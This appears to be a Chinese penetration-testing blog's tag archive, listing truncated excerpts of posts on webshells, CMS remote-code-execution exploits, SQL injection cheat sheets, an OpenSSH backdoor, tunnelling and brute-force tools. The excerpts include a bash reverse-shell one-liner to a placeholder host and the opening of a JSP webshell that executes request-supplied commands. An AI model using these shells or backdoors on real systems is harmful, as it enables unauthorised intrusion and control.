Menu

Tag Archives: 渗透测试

redis绕过云盾写webshell提权08服务器
半年多没写文章了。 第一部分拿webshell: 前不久,我们公司被大批肉鸡DDOS,攻击来源大约有几千个IP […]
ImageMagick—-Remote Command Execute in WordPress 4.5.1
ImageMagick ImageMagick 昨天曝出 CVE-2016-3714,Java、PHP 的库也 […]
一个稳定的UDP反向端口映射方法
使用到的工具 https://github.com/ring04h/udptunnel http://fuzz […]
JOOMLA 1.5 – 3.4.5 远程代码执行之批量GETSHELL
看大家发的都是单打独斗的,我来献丑来个批量getshell的吧,不喜勿喷! 0X01 背景 近日,Joomla […]
jsp内网探测脚本&简单代理访问
废话不多说,直接上图: 1.直接访问默认扫描当前IP的C段,获取标题、web容器. 2.可以自定义传入需要扫描 […]
SQL注入速查表(下)与Oracle注入速查表
一、SQL注入速查表(下) 0x00 目录 盲注 关于盲注 实战中的盲注实例 延时盲注 WAITFOR DEL […]
SQL注入速查表(上)
  0x00 关于SQL注入速查表 现在仅支持MySQL、Microsoft SQL Server, […]
Jsp一句话木马后门
一:执行系统命令: 无回显执行系统命令: <%Runtime.getRuntime().exec(req […]
Linux渗透之openSSH后门
首先拿下服务器shell权限,其次利用各种方式提下root! 拿下root之后才是开始: 1.首先查看ssh版 […]
Dedecms远程写文件漏洞
0x00 漏洞概述 2015年6月17日seclists网站上公布了Dedecms的一个远程getshell漏 […]
内网转发工具———-tunna
他的原理就是个HTTP tunneling工具。 +————& […]
PHPCMS_V9之authkey注入漏洞
在乌云上的某一个漏洞 PHPCMS最新版本authkey泄露可注射拿shell 但是他没有给出利用的方法,如何 […]
SQLMAP 防火墙的绕过与过滤
[为0x00] – 简介 [0X01] – 过滤闪避(MySQL的) [0x01a] […]
Linux下的爆破神器————-HYDRA
# hydra [-L FILE] [-p PASS | [-C FILE]] [-e ns] [-o FIL […]
Nmap 详细介绍(2)
0x00:说明 只是一个快速查询手册,理论的东西都没有补充,欢迎大家积极在评论区补充自己常用的参数,O(∩_∩ […]
Nmap 详细介绍(1)
ubuntu apt-get install nmap 工具介绍:NMap是Linux下的网络扫描和嗅探工具包 […]
Linux发行版本号及内核版本号对照表
为了方便用EXP提权。 Redhat 9.0———————————————2.4.20-8 RHEL 3 Up […]
Linux 提权的时候需要反弹的各种方法
bash版本: bash -i >& /dev/tcp/xx.xx.xx.xx/xx 0> […]